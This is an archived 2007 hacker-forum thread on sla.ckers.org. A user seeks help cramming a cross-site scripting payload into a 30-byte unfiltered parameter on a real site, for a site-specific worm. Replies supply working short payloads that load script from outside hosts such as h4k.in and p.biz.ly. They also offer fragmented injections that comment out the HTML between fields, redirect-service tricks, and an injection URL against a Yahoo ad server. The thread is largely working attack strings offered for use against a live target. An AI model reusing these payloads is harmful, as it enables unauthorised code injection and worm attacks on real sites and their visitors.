Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Super-Short XSS
Posted by: rebel
Date: February 15, 2007 07:14PM

Hi Slackers,

I am a bit stuck with a particular site. After finally having found a parameter that listens to GET and is not filtered (filtered fields remove <), I am left with no more than 30 exploitable bytes ..

'<script src=""/>' is 16, 'http://' is another 7, tld will eat up at least another 2 bytes plus 1 byte being the trailing dot.. so, 4 bytes left for the domain, assuming a "GET /" would serve the XSS. Otherwise, 2 bytes left for the domain if I would use a 1-digit file ("GET /s"). This would be enough if I had access to di.fm or similar.. Unfortunately I haven't.

I need to shorten this, and don't really know how .. Some ideas so far:
I maybe could use "ftp" instead of "http"..
Maybe there is something similar to tinyurl.com with a very short domain name..
Or I am missing something else and some of the chars I calculated in are not needed..

Please help me on this one.

Options: ReplyQuote
Re: Super-Short XSS
Posted by: tx
Date: February 15, 2007 07:23PM

What about the Protocol resolution in script tags vector from the cheatsheet: <SCRIPT SRC=//ha.ckers.org/.j> that's 30 exactly
IE only though.

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 02/15/2007 07:25PM by tx.

Options: ReplyQuote
Re: Super-Short XSS
Posted by: rebel
Date: February 15, 2007 07:31PM

Thanks for the quick reply. It would work, I have access to some 6-8 digit .com domains. :) Pointing out that the script tag doesnt need to be closed again is a start!
Still, solving about any problem "IE-only" gives me headaches and sleepless nights. I will do it this way if noone comes up with anything cross-browser compatible until after the weekend, though.

Options: ReplyQuote
Re: Super-Short XSS
Posted by: hasse
Date: February 15, 2007 08:23PM

Take a look here, one of these sites might be useful:
http://dmoz.org/Computers/Internet/Web_Design_and_Development/Hosted_Components_and_Services/Redirects



Edited 1 time(s). Last edit at 02/15/2007 08:24PM by hasse.

Options: ReplyQuote
Re: Super-Short XSS
Posted by: rebel
Date: February 16, 2007 05:30AM

Thx hasse,
I'm trying the short ones from this list. No luck so far though, seems as if most of them do redirection inside a frameset so the url that is being forwarded to doesn't show up in the browser location bar.

Options: ReplyQuote
Re: Super-Short XSS
Posted by: trev
Date: February 16, 2007 07:30AM

http://www.aboutus.org/Category:Redirect has more redirection services but it seems that surl.ws produces the shortest URLs.

Options: ReplyQuote
Re: Super-Short XSS
Posted by: kirke
Date: February 16, 2007 03:40PM

the shortest you can get at www.at.hm , IMHO ...

Options: ReplyQuote
Re: Super-Short XSS
Posted by: Spikeman
Date: February 18, 2007 07:31AM

I while ago I was having the same issue and I recommended RSnake make http://ckers.org/s point to the Stallowned thing, and he did. So <script src=//ckers.org/s> maybe? Also, if you are able to inject more than one place on the page you could inject <script src=//ckers.org/s> in the first and the closing script tag in the second. I did this in a highscores table for some online game.

Options: ReplyQuote
Re: Super-Short XSS
Posted by: Anonymous User
Date: February 18, 2007 09:03AM

This XSS works in Firefox and has only 27 Bytes - could be even shorter with another URL. I couldn't get it working in IE 6/7 - they seem to insist on something tp close the tag/attribute.

http://p.biz.ly/shortxss.html

Source:
<script src=//p.biz.ly/x.js



Edited 2 time(s). Last edit at 02/18/2007 09:38AM by .mario.

Options: ReplyQuote
Re: Super-Short XSS
Posted by: rebel
Date: February 18, 2007 10:00AM

@Spikeman: good point on doing a second XSS for closing the tag. It would work, provided that it's okay for random html to appear <script ..>here</script>. Nice move from RSnake to host that image for you, although I assume that he is not very much interested in hosting a worm written for a specific site for me. ;)

.mario: nice one. so maybe I can do one XSS for IE, another for FF and a third (not sure I have 3 XSSable fields, will check tomorrow) to close it.

Options: ReplyQuote
Re: Super-Short XSS
Posted by: Anonymous User
Date: February 18, 2007 10:06AM

@rebel: yep - sounds good. if you can use fragmented xss which appends directly you can get it running in ie i guess.

XSS1 <script src=//p.biz.ly/x.js
XSS2 ></script>

Options: ReplyQuote
Re: Super-Short XSS
Posted by: rebel
Date: February 18, 2007 10:49AM

@.mario: nope, it doesn't append directly, there's a bunch of HTML between it as I said.

Options: ReplyQuote
Re: Super-Short XSS
Posted by: Anonymous User
Date: February 18, 2007 11:28AM

Maybe you could inject HTML comments to deactivate the HTML between the field output like this (IE7/IE6 + FFox):

XSS1 <script src=//p.biz.ly/x.js><!--
XSS2 --></script>

Guess the url should be a little bit shorter to be still under 30 chars :) Also that one also works in IE7/IE6 +FFox

<script src=include.js>
<b>test</b>
</script>



Edited 1 time(s). Last edit at 02/18/2007 11:33AM by .mario.

Options: ReplyQuote
Re: Super-Short XSS
Posted by: hasse
Date: February 18, 2007 01:04PM

.mario Wrote:
-------------------------------------------------------
> Maybe you could inject HTML comments to deactivate
> the HTML between the field output like this
> (IE7/IE6 + FFox):
>
> XSS1 <!--
> XSS2 -->
>
> Guess the url should be a little bit shorter to be
> still under 30 chars :) Also that one also works
> in IE7/IE6 +FFox
>
>
> test
>

If it's between script tags shouldn't you use javascript comments?
XSS1 <script src=//p.biz.ly/x.js>/*
XSS2 */</script>



Edited 1 time(s). Last edit at 02/18/2007 01:10PM by hasse.

Options: ReplyQuote
Re: Super-Short XSS
Posted by: rebel
Date: February 18, 2007 01:11PM

Beautiful :) Thanks alot - tomorrow I'll hopefully get me a short URL that does real redirection (no frames.. real HTTP Header 302 redirection..) and implement it like this - in two pieces, commenting out the html in between. Great that src=//.. also works in FF! I'll let you know how it worked out.

Options: ReplyQuote
Re: Super-Short XSS
Posted by: Anonymous User
Date: February 18, 2007 05:29PM

@hasse: sounds logical and should work too - but even

<script src=include.js><></script>

works on latest FFox,IE & Opera... that's two characters shorter.

@rebel: good luck! btw: biz.ly is quite cool. it's free and features webspace. i think n.biz.ly was still free when i checked this afternoon :)

Options: ReplyQuote
Re: Super-Short XSS
Posted by: Anonymous User
Date: February 20, 2007 01:51PM

Here's another super short XSS - registered the domain some days ago:

<script src=//h4k.in
FFox only (20 characters)

<script src=//h4k.in></script>
all other Browsers (30 characters)

URL: http://h4k.in

Hope I didn't miscount...

Greetings,
.mario

Options: ReplyQuote
Re: Super-Short XSS
Posted by: kogir
Date: February 20, 2007 10:40PM

<script src=http://h4k.in/>
(27 chars)

works both in Firefox 2 and IE 7. It seems the last '/' closes the tag as it won't work in either browser without it. I don't know if it works for Opera.

-kogir

Options: ReplyQuote
Re: Super-Short XSS
Posted by: Kyran
Date: February 20, 2007 11:42PM

It does work in Opera. :)

- Kyran

Options: ReplyQuote
Re: Super-Short XSS
Posted by: Anonymous User
Date: February 21, 2007 07:03AM

nice one, kogir!

Options: ReplyQuote
Re: Super-Short XSS
Posted by: trev
Date: March 18, 2007 12:23PM

Can you get it any shorter? :)
http://us.adserver.yahoo.com/a?f=123&p=ysm&l=--%3E%3Cscript%20src=// - adding any more characters causes it to error out.

Options: ReplyQuote
Re: Super-Short XSS
Posted by: Anonymous User
Date: March 19, 2007 03:39AM

Hmmm, i don't think so - 20 characters are minimum. Or you maybe happen to have a domain like x.org? ;)

Options: ReplyQuote
Re: Super-Short XSS
Posted by: trev
Date: March 19, 2007 07:51AM

x.nu would be better ;)

Options: ReplyQuote
Re: Super-Short XSS
Posted by: Anonymous User
Date: March 19, 2007 09:11AM

Maybe this would help:

https://secure.registerapi.com/dds2/index.php

Options: ReplyQuote
Re: Super-Short XSS
Posted by: rsnake
Date: March 19, 2007 11:39AM

Hmm... maybe it would be a good idea for someone to bite the bullet and pay for a super short domain that looks for referrers to send users off to. That way you really could use x.nu for all this stuff:

<script src=//x.nu (17chars and works in Firefox)

- RSnake
Gotta love it. http://ha.ckers.org



Edited 1 time(s). Last edit at 03/19/2007 11:39AM by rsnake.

Options: ReplyQuote
Re: Super-Short XSS
Posted by: trev
Date: March 19, 2007 12:36PM

RSnake, I really don't want to contradict you but it is 18 chars :)
Now I only need to cut down another 4 chars...

Options: ReplyQuote
Re: Super-Short XSS
Posted by: rsnake
Date: March 19, 2007 06:55PM

Gah! I counted it three times, and I got 17 twice. You're right, and my counting skills are obviously lax.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Super-Short XSS
Posted by: rsnake
Date: March 19, 2007 06:57PM

Well if you owned a one letter TLD.com you could do something like:

<script src=//x (takes you to PayPal in Firefox).

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Super-Short XSS
Posted by: trev
Date: March 19, 2007 07:09PM

Lol. No, that one only works in the address line - it tries x.com and www.x.com if it cannot resolve x. But for a script or an iframe you will need to specify the full www.x.com address.

Options: ReplyQuote
Re: Super-Short XSS
Posted by: rsnake
Date: March 19, 2007 08:30PM

Ugh, you're right, I should have tested that, it didn't work:

http://x:80

GET / HTTP/1.1
Host: x
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 Firefox/2.0.0.2
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://ha.ckers.org/
Cache-Control: max-age=0

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote


Sorry, only registered users may post in this forum.